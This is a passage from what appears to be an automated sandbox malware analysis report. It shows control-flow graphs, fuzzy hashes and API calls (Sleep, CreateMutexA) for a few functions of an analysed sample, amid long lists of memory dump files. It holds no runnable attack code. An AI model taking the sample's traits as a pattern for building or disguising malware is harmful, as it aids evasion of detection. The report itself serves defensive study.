                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: b8dbd20f3d487e70de275d91e32e927d53a74ccb45e5c2034571e2af6272aebd
                                                                                                                                                                    • Instruction ID: a9158164086d48442392b117c09053901a1ae5ff3f6f1bef266c879bb6122247
                                                                                                                                                                    • Opcode Fuzzy Hash: b8dbd20f3d487e70de275d91e32e927d53a74ccb45e5c2034571e2af6272aebd
                                                                                                                                                                    • Instruction Fuzzy Hash: 9E314C71B002048BEB18EB7DDD89BEDB762EF85324F244219E454EB2D5C7398981EB12
                                                                                                                                                                    Function 00FBA682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 387 fba682-fba6a2 391 fba6d0-fba6ec 387->391 392 fba6a4-fba6b0 387->392 395 fba71a-fba739 391->395 396 fba6ee-fba6fa 391->396 393 fba6b2-fba6c0 392->393 394 fba6c6-fba6cd call fcd663 392->394 393->394 401 fba949 393->401 394->391 399 fba73b-fba747 395->399 400 fba767-fba916 call fc80c0 395->400 397 fba6fc-fba70a 396->397 398 fba710-fba717 call fcd663 396->398 397->398 397->401 398->395 404 fba749-fba757 399->404 405 fba75d-fba764 call fcd663 399->405 406 fba94e 401->406 407 fba949 call fe6c6a 401->407 404->401 404->405 405->400 410 fba953-fba994 Sleep CreateMutexA 406->410 411 fba94e call fe6c6a 406->411 407->406 419 fba9a7-fba9a8 410->419 420 fba996-fba998 410->420 411->410 420->419 421 fba99a-fba9a5 420->421 421->419
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: 081707ef8ea6045e28d87511609ea9a5ed2f75a6558c05500f4e693bba43f08d
                                                                                                                                                                    • Instruction ID: 653a6aa74bae9f0c3c3d60d2bee8338858d05036ff6329188653a0c52cbeb30b
                                                                                                                                                                    • Opcode Fuzzy Hash: 081707ef8ea6045e28d87511609ea9a5ed2f75a6558c05500f4e693bba43f08d
                                                                                                                                                                    • Instruction Fuzzy Hash: AF316C71B042009BEB18DB79DD89BDDB762EF81320F348218E414DB2D5DB394980EB12
                                                                                                                                                                    Function 00FB9ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 423 fb9adc-fb9ae8 424 fb9aea-fb9af8 423->424 425 fb9afe-fb9b27 call fcd663 423->425 424->425 426 fba917 424->426 433 fb9b29-fb9b35 425->433 434 fb9b55-fb9b57 425->434 428 fba953-fba994 Sleep CreateMutexA 426->428 429 fba917 call fe6c6a 426->429 437 fba9a7-fba9a8 428->437 438 fba996-fba998 428->438 429->428 435 fb9b4b-fb9b52 call fcd663 433->435 436 fb9b37-fb9b45 433->436 439 fb9b59-fba916 call fc80c0 434->439 440 fb9b65-fb9d91 call fc7a00 call fb5c10 call fb8b30 call fc8220 call fc7a00 call fb5c10 call fb8b30 call fc8220 434->440 435->434 436->426 436->435 438->437 442 fba99a-fba9a5 438->442 442->437
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: 902a880149da6b1ef32b29934513cae0f21b89234134b5c3a55acaa82dd0b526
                                                                                                                                                                    • Instruction ID: 48319b4ff5ff9ae4c6c67296b64eb77c9793ec2c8b3e61c00e90d03dc424b549
                                                                                                                                                                    • Opcode Fuzzy Hash: 902a880149da6b1ef32b29934513cae0f21b89234134b5c3a55acaa82dd0b526
                                                                                                                                                                    • Instruction Fuzzy Hash: 9A214C317042019BEB18AB69EC89BECF761EFC1320F20421DE418DB2D5D77A4981EB11
                                                                                                                                                                    Function 00FBA856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 500 fba856-fba86e 501 fba89c-fba89e 500->501 502 fba870-fba87c 500->502 505 fba8a9-fba8b1 call fb7d30 501->505 506 fba8a0-fba8a7 501->506 503 fba87e-fba88c 502->503 504 fba892-fba899 call fcd663 502->504 503->504 507 fba94e 503->507 504->501 516 fba8b3-fba8bb call fb7d30 505->516 517 fba8e4-fba8e6 505->517 509 fba8eb-fba916 call fc80c0 506->509 511 fba953-fba987 Sleep CreateMutexA 507->511 512 fba94e call fe6c6a 507->512 520 fba98e-fba994 511->520 512->511 516->517 524 fba8bd-fba8c5 call fb7d30 516->524 517->509 522 fba9a7-fba9a8 520->522 523 fba996-fba998 520->523 523->522 525 fba99a-fba9a5 523->525 524->517 529 fba8c7-fba8cf call fb7d30 524->529 525->522 529->517 532 fba8d1-fba8d9 call fb7d30 529->532 532->517 535 fba8db-fba8e2 532->535 535->509
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
